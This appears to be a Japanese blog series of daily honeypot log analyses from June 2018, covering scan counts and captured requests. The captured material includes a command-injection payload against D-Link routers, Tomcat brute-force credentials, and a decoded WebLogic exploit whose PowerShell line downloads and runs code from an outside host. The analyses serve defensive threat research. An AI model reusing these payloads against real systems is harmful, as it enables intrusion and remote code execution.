WOWHoneypot簡易分析(11日目)
WOWhoneypotの2018/6/14(木)(運用11日目)の簡易分析です。
本日の総アクセス数は413件です。一気に倍近いのアクセスが来てビックリです。
$ awk '/06-14/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr
163 [2018-06-14 "GET /
153 [2018-06-14 "POST /command.php
41 [2018-06-14 "GET /manager/html
10 [2018-06-14 "HEAD /
1 [2018-06-14 "PROPFIND /
1 [2018-06-14 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-14 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-14 "GET /xampp/phpmyadmin/index.php
1 [2018-06-14 "GET /www/phpMyAdmin/index.php
1 [2018-06-14 "GET /web/phpMyAdmin/index.php
1 [2018-06-14 "GET /upload/bank-icons/bank-gh.jpg
1 [2018-06-14 "GET /upload/bank-icons/bank_16.png
1 [2018-06-14 "GET /typo3/phpmyadmin/index.php
1 [2018-06-14 "GET /tools/phpMyAdmin/index.php
1 [2018-06-14 "GET /stssys.htm
1 [2018-06-14 "GET /pmd/index.php
1 [2018-06-14 "GET /pma-old/index.php
1 [2018-06-14 "GET /pmamy2/index.php
1 [2018-06-14 "GET /PMA/index.php
1 [2018-06-14 "GET /pma/index.php
1 [2018-06-14 "GET /PMA2/index.php
1 [2018-06-14 "GET /phpMyAdminold/index.php
1 [2018-06-14 "GET /phpMyAdmin.old/index.php
1 [2018-06-14 "GET /phpmyadmin-old/index.php
1 [2018-06-14 "GET /phpMyAdmin/index.php
1 [2018-06-14 "GET /phpmyadmin/index.php
1 [2018-06-14 "GET /phpMyadmin_bak/index.php
1 [2018-06-14 "GET /phpmyadmin2/index.php
1 [2018-06-14 "GET /phpmyadmin1/index.php
1 [2018-06-14 "GET /phpadmin/index.php
1 [2018-06-14 "GET /mysqladmin/index.php
1 [2018-06-14 "GET /mysql-admin/index.php
1 [2018-06-14 "GET /myadmin2/index.php
1 [2018-06-14 "GET /index.php
1 [2018-06-14 "GET hxxp://httpheader.net/
1 [2018-06-14 "GET hxxp://clientapi.ipip[.]net/echo.php?info=20180614062859
1 [2018-06-14 "GET hxxp://114.215.207[.]183:83/index.php
1 [2018-06-14 "GET hxxp://112.124.127[.]162:83/index.php
1 [2018-06-14 "GET /.git/config
1 [2018-06-14 "GET /db/index.php
1 [2018-06-14 "GET /dbadmin/index.php
1 [2018-06-14 "GET /claroline/phpMyAdmin/index.php
1 [2018-06-14 "GET /cgi/common.cgi
1 [2018-06-14 "GET /admin/PMA/index.php
1 [2018-06-14 "GET /admin/pma/index.php
1 [2018-06-14 "GET /admin/phpMyAdmin/index.php
1 [2018-06-14 "GET /admin/phpmyadmin/index.php
1 [2018-06-14 "GET /admin/mysql/index.php
1 [2018-06-14 "GET /admin/mysql2/index.php
1 [2018-06-14 "GET /admin/index.php
いつものようにindex.phpを除きます。
$ awk '/06-14/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr | grep -v index.php
163 [2018-06-14 "GET /
153 [2018-06-14 "POST /command.php
41 [2018-06-14 "GET /manager/html
10 [2018-06-14 "HEAD /
1 [2018-06-14 "PROPFIND /
1 [2018-06-14 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-14 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-14 "GET /upload/bank-icons/bank-gh.jpg
1 [2018-06-14 "GET /upload/bank-icons/bank_16.png
1 [2018-06-14 "GET /stssys.htm
1 [2018-06-14 "GET hxxp://httpheader[.]net/
1 [2018-06-14 "GET hxxp://clientapi.ipip[.]net/echo.php?info=20180614062859
1 [2018-06-14 "GET /.git/config
1 [2018-06-14 "GET /cgi/common.cgi
本日大量に来ていたcommnad.phpのリクエストの中身は以下の通りでした。
POST /command.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208cmd=cd /var/tmp && echo -ne \\x00\\x00\\x00\\x00\\x00 >> drop && echo OK
これは5日目に来ていたものと同一と思われます。
Reaper というIoTボットネット/マルウェアが対象としている D-Link DIR-600とDIR-300 への攻撃かと思われます。
Reaperボットネットに関する簡単なまとめ - 忙しい人のためのサイバーセキュリティニュース
また、昨日と同様以下のアクセスがありました。Tomcatの管理ページに対するブルートフォース攻撃と思われます。
GET /manager/html HTTP/1.1
Content-Type: text/html
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Authorization: Basic dXNlcjpzM2NyZXQ=
新しいものとして、以下がありました。詳細は不明ですが、画像ファイルが存在するかの調査行為のように思えます。
GET /upload/bank-icons/bank-gh.jpg HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxp://(ipaddr):80/upload/bank-icons/bank-gh.jpg
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Connection: Keep-Alive
Cache-Control: no-cacheGET /upload/bank-icons/bank_16.png HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: hxxxp://(ipaddr):80/upload/bank-icons/bank_16.png
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Connection: Keep-Alive
Cache-Control: no-cache
その他細かいものは後日調べようと思います…
ハンティングログには残っていませんでした。
以上です。
WOWHoneypot簡易分析(10日目)
WOWhoneypotの2018/6/13(水)(運用10日目)の簡易分析です。
本日の総アクセス数は291件です。
$ awk '/06-13/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr
148 [2018-06-13 "GET /
74 [2018-06-13 "GET /manager/html
2 [2018-06-13 "HEAD /
2 [2018-06-13 "GET /xampp/phpmyadmin/index.php
2 [2018-06-13 "GET /www/phpMyAdmin/index.php
2 [2018-06-13 "GET /web/phpMyAdmin/index.php
2 [2018-06-13 "GET /typo3/phpmyadmin/index.php
2 [2018-06-13 "GET /pmd/index.php
2 [2018-06-13 "GET /pma-old/index.php
2 [2018-06-13 "GET /pmamy2/index.php
2 [2018-06-13 "GET /pma/index.php
2 [2018-06-13 "GET /PMA2/index.php
2 [2018-06-13 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-13 "GET /phpMyAdminold/index.php
2 [2018-06-13 "GET /phpmyadmin-old/index.php
2 [2018-06-13 "GET /phpMyAdmin/index.php
2 [2018-06-13 "GET /phpMyadmin_bak/index.php
2 [2018-06-13 "GET /phpmyadmin1/index.php
2 [2018-06-13 "GET /phpmyadmin0/index.php
2 [2018-06-13 "GET /phpma/index.php
2 [2018-06-13 "GET /phpadmin/index.php
2 [2018-06-13 "GET /mysql-admin/index.php
2 [2018-06-13 "GET /myadmin/index.php
2 [2018-06-13 "GET /myadmin2/index.php
2 [2018-06-13 "GET /index.php
2 [2018-06-13 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-13 "GET /admin/PMA/index.php
2 [2018-06-13 "GET /admin/pma/index.php
2 [2018-06-13 "GET /admin/phpMyAdmin/index.php
2 [2018-06-13 "GET /admin/phpmyadmin2/index.php
2 [2018-06-13 "GET /admin/mysql/index.php
2 [2018-06-13 "GET /admin/mysql2/index.php
1 [2018-06-13 "PROPFIND /
1 [2018-06-13 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-13 "GET /pma/scripts/setup.php
1 [2018-06-13 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-13 "GET /phpmyadmin/phpmyadmin/index.php
1 [2018-06-13 "GET /myadmin/scripts/setup.php
1 [2018-06-13 "GET /db/index.php
1 [2018-06-13 "GET /dbadmin/index.php
1 [2018-06-13 "GET /admin/index.php
phpMyAdmin関係と思われるものを除きます。
awk '/06-13/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr | grep -v index.php
148 [2018-06-13 "GET /
74 [2018-06-13 "GET /manager/html
2 [2018-06-13 "HEAD /
1 [2018-06-13 "PROPFIND /
1 [2018-06-13 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-13 "GET /pma/scripts/setup.php
1 [2018-06-13 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-13 "GET /myadmin/scripts/setup.php
phpMyAdmin関係はこれまでindex.phpでしたが、本日はsetup.phpへのアクセスも3件ありました。
/wls-wsat/はWeblogicの脆弱性をついた攻撃と思いますが、前日と同様の内容でした。
それ以外で多かったのは、以下です。
74 [2018-06-13 "GET /manager/html
これまでもありましたが、Tomcatの管理ツールがあるかの調査行為と思われます。
パケットの内容を見ると、例えば以下です。
GET /manager/html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Authorization: Basic bWFuYWdlcjp0b21jYXQyMDE3 ※manager:tomcat2017
GET /manager/html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Authorization: Basic bWFuYWdlcjp0b21jYXQyMDE4 ※manager:tomcat2018
どうやら管理ページが存在するはずのページにbasic認証でブルートフォースを仕掛けているようです。そのため、アクセス数も多くなっているようです
ハンティングログはありませんでした。
以上です。
WOWHoneypot簡易分析(9日目)
WOWhoneypotの2018/6/12(火)(運用9日目)の簡易分析です。
本日の総アクセス数は186件です。
$ awk '/06-12/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
108 [2018-06-12 "GET /
4 [2018-06-12 "GET /pma/index.php
4 [2018-06-12 "GET /phpmyadmin/index.php
4 [2018-06-12 "GET /mysql/index.php
4 [2018-06-12 "GET /index.php
4 [2018-06-12 "GET /db/index.php
3 [2018-06-12 "HEAD /
3 [2018-06-12 "GET /pmamy2/index.php
2 [2018-06-12 "POST /wls-wsat/CoordinatorPortType
2 [2018-06-12 "GET /pmd/index.php
2 [2018-06-12 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-12 "GET /phpMyAdmin.old/index.php
2 [2018-06-12 "GET /phpmyadmin-old/index.php
2 [2018-06-12 "GET /phpMyAdmin/index.php
2 [2018-06-12 "GET /phpMyadmin_bak/index.php
2 [2018-06-12 "GET /phpmyadmin2/index.php
2 [2018-06-12 "GET /phpmyadmin1/index.php
2 [2018-06-12 "GET /phpma/index.php
2 [2018-06-12 "GET /phpadmin/index.php
2 [2018-06-12 "GET /mysql-admin/index.php
2 [2018-06-12 "GET /myadmin/index.php
2 [2018-06-12 "GET /myadmin2/index.php
2 [2018-06-12 "GET /dbadmin/index.php
2 [2018-06-12 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-12 "GET /admin/PMA/index.php
2 [2018-06-12 "GET /admin/phpmyadmin/index.php
2 [2018-06-12 "GET /admin/mysql/index.php
2 [2018-06-12 "GET /admin/index.php
1 [2018-06-12 "PROPFIND /
1 [2018-06-12 "GET /web/phpMyAdmin/index.php
1 [2018-06-12 "GET /pma-old/index.php
1 [2018-06-12 "GET /PMA/index.php
1 [2018-06-12 "GET /PMA2/index.php
1 [2018-06-12 "GET /phpMyAdmin/phpMyAdmin/index.php
1 [2018-06-12 "GET /phpMyAdminold/index.php
1 [2018-06-12 "GET /phpmyadmin0/index.php
1 [2018-06-12 "GET hxxp://httpheader[.]net/
1 [2018-06-12 "GET hxxp://db.speedup[.]gdn/echo.php
1 [2018-06-12 "GET /favicon.ico
1 [2018-06-12 "GET /admin/mysql2/index.php
ハンティングログは0件でした。
アクセスログからPhpMyAdmin関連と思われるindex.phpへのアクセスを除きます。
$ awk '/06-12/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr | grep -v index.php
108 [2018-06-12 "GET /
3 [2018-06-12 "HEAD /
2 [2018-06-12 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-12 "PROPFIND /
1 [2018-06-12 "GET hxxp://httpheader[.]net/
1 [2018-06-12 "GET hxxp://db.speedup[.]gdn/echo.php
1 [2018-06-12 "GET /favicon.ico
毎日のWeblogicの脆弱性をつく任意のコード実行の攻撃部分です。 いつもとパターンは同じです。
$ awk '/06-12/{print $1,$5,$6,$10}' access_log | grep wls | awk '{print $4}' | base64 -d | grep -o 'Hidden.*' | awk '{print $3}' | base64 -d
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://101.200.45[.]78/images/test/DL.php');base64: invalid input
以下は6/9も来ていたものです。UAから公開プロキシを探すスキャン行為と思われます。
GET hxxp://db.speedup[.]gdn/echo.php HTTP/1.1
User-Agent: PxBroker/0.3.1/5351
Accept: */*
Accept-Encoding: gzip, deflate
Pragma: no-cache
Cache-control: no-cache
Cookie: cookie=ok
Referer: https://www.google.com/
Host: db.speedup.gdn
Connection: close
Content-Length: 0
以下はどんな攻撃によるものか詳細不明です。
GET hxxp://httpheader[.]net/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)
Host: httpheader.net
Accept-Encoding: deflate, gzip
Proxy-Connection: Keep-Alive
Accept-Language: en-gb,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Pragma: no-cache
Cache-Control: no-cache
以上です。